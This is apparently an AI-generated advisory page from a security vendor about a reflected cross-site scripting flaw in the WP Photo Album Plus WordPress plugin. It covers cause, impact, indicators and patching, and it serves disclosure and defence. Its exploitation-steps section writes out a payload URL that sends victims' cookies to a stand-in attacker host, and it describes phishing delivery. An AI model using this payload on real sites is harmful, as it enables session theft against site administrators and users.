CVE-2025-14835
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-14835 is a Reflected Cross-Site Scripting (XSS) vulnerability in the WP Photo Album Plus plugin for WordPress. It affects all versions up to and including 9.1.05.008, caused by insufficient input sanitization and output escaping of the shortcode parameter. Unauthenticated attackers can inject arbitrary web scripts that execute in a victim's browser if the victim is tricked into clicking a malicious link. The vulnerability was published on January 7, 2026, and carries a CVSS v3.1 base score of 7.1 (High) (Wordfence, Red Hat CVE).

Technical details

The root cause is classified as CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page) and CWE-79 (Cross-site Scripting). The vulnerable shortcode parameter is processed without adequate sanitization in the plugin's AJAX handler (wppa-ajax.php) and filter logic (wppa-filter.php), allowing attacker-controlled input to be reflected directly into the HTML response (ENISA EUVD). Exploitation requires no authentication or special privileges — only that a victim user clicks a crafted link, making this a classic reflected (non-persistent) XSS attack vector. Relevant source code references include wppa-ajax.php#L1130, wppa-ajax.php#L43, wppa-filter.php#L125, and wppa-functions.php#L5617 (WordPress Trac).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the victim's browser session on the affected WordPress site. This can lead to session cookie theft, credential harvesting, defacement of page content as seen by the victim, or redirection to malicious sites. The CVSS scope is marked as Changed, indicating that the impact extends beyond the vulnerable component itself, with low confidentiality, integrity, and availability impacts (Wordfence).

Exploitability

No evidence of active in-the-wild exploitation or inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog has been reported for this CVE. The EPSS score is approximately 0.08%, indicating a low probability of exploitation in the near term (Feedly). The vulnerability requires user interaction (victim clicking a crafted link), which somewhat limits opportunistic mass exploitation. No public proof-of-concept exploit code has been identified beyond the source code references disclosed by Wordfence.

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the WP Photo Album Plus plugin at version 9.1.05.008 or earlier using tools like WPScan or Shodan with WordPress fingerprinting.
  2. Craft malicious URL: Construct a URL targeting the plugin's AJAX endpoint with a malicious payload injected into the shortcode parameter, e.g., https://target-site.com/wp-admin/admin-ajax.php?action=wppa_ajax&shortcode=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  3. Deliver the link: Send the crafted URL to a target user (e.g., a logged-in WordPress administrator) via phishing email, social media, or other social engineering channels.
  4. Trigger execution: When the victim clicks the link, the unsanitized shortcode parameter is reflected in the server's HTML response and the injected script executes in the victim's browser.
  5. Achieve objective: The attacker harvests session cookies, performs actions on behalf of the victim, or redirects the victim to a malicious site (Wordfence, WordPress Trac).

Indicators of compromise

  • Network: HTTP GET or POST requests to WordPress AJAX endpoints (e.g., admin-ajax.php) containing URL-encoded script tags or JavaScript payloads in the shortcode parameter; outbound requests from victim browsers to unknown external domains shortly after visiting a WordPress page.
  • Logs: WordPress or web server access logs showing requests with shortcode parameter values containing <script>, javascript:, onerror=, or similar XSS patterns; unusual referrer headers in server logs indicating crafted link delivery.
  • Browser/Client: Unexpected redirects or pop-ups on WordPress pages; browser developer tools showing injected script execution originating from AJAX responses.

Mitigation and workarounds

Users should update the WP Photo Album Plus plugin to a version beyond 9.1.05.008, which includes the fix applied in the trunk changeset (WordPress Trac Changeset). As a temporary workaround, site administrators can disable the plugin until a patched version is applied. Deploying a Web Application Firewall (WAF) with XSS filtering rules can help mitigate exploitation attempts in the interim (Wordfence).

Community reactions

Wordfence disclosed this vulnerability as part of their weekly WordPress vulnerability report for January 5–11, 2026, noting it as one of many plugin-level XSS issues discovered during that period (Wordfence Blog). No significant broader media coverage or notable researcher commentary beyond the Wordfence disclosure has been identified.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2024-13784CRITICAL9.8
  • arforms-form-builder
NoYesAug 16, 2026
CVE-2026-17087HIGH7.5
  • wp-travel-engine
NoYesAug 16, 2026
CVE-2026-2497HIGH7.2
  • gallery-plugin
NoYesAug 16, 2026
CVE-2026-17608MEDIUM6.5
  • wp-compress-image-optimizer
NoYesAug 16, 2026
CVE-2026-2357MEDIUM6.4
  • bold-page-builder
NoYesAug 16, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management